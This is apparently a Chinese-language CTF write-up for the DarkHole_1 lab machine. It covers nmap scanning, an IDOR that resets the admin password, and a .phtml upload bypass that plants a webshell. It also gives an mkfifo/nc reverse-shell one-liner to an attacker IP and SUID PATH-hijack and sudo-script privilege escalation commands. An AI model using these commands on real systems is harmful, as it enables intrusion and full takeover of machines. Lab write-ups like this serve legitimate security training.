DarkHole_1的拿flag思路
首先第一步是找到主页,第二步是通过login的垂直越权切换到admin,第三步通过admin里的文件上传拿到webshell,第四步通过webshell进行本机提权!
1.第一步:找到目标主机
首先ifconfig找到本机ip
通过kali自带nmap扫描到目标主机ip
nmap -A 192.168.204.0/24

通过nmap扫描出来22和80端口,22端口可以尝试ssh爆破
先打开80端口看下网页
2.越权


靶机提示不用采取爆破,所以先注册一个账号
经过尝试可以通过修改id,对admin账户进行密码修改
使用burp修改id值,达到修改admin账户密码,登录后发现有上传点

3.文件上传

尝试了.htaccess,双写,大小写,有些可以上传但是无法执行,后来通过改后缀为.phtml,成功绕过并执行

通过蚁剑连接用NC反弹shell
经测试不能用-e,采取别的方式
目标主机:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.131 7777 >/tmp/f

kali:
nc -lvvp 7777

反弹成功
升级成交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

第四步:提权
通过find命令查找具有suid权限的文件
find / -perm -u=s -type f 2>/dev/null

使用PATH 变量进行权限提升,拿到john权限
echo $PATH
echo "/bin/bash" >/tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
echo $PATH
./toto
whoami

通过ls -l ,查看user拿到第一个flag,查看password拿到密码

通过sudo -l,看到提升root的提示
通过在file.py中添加命令获得root 权限
#file.py
import os;
os.system('chmod +s /bin/bash');
bash -p

到root目录下找到第二个flag
总结:
这个靶机主要是考察了三个点,越权,文件上传,PATH提权
版权声明:本文为m0_56414371原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。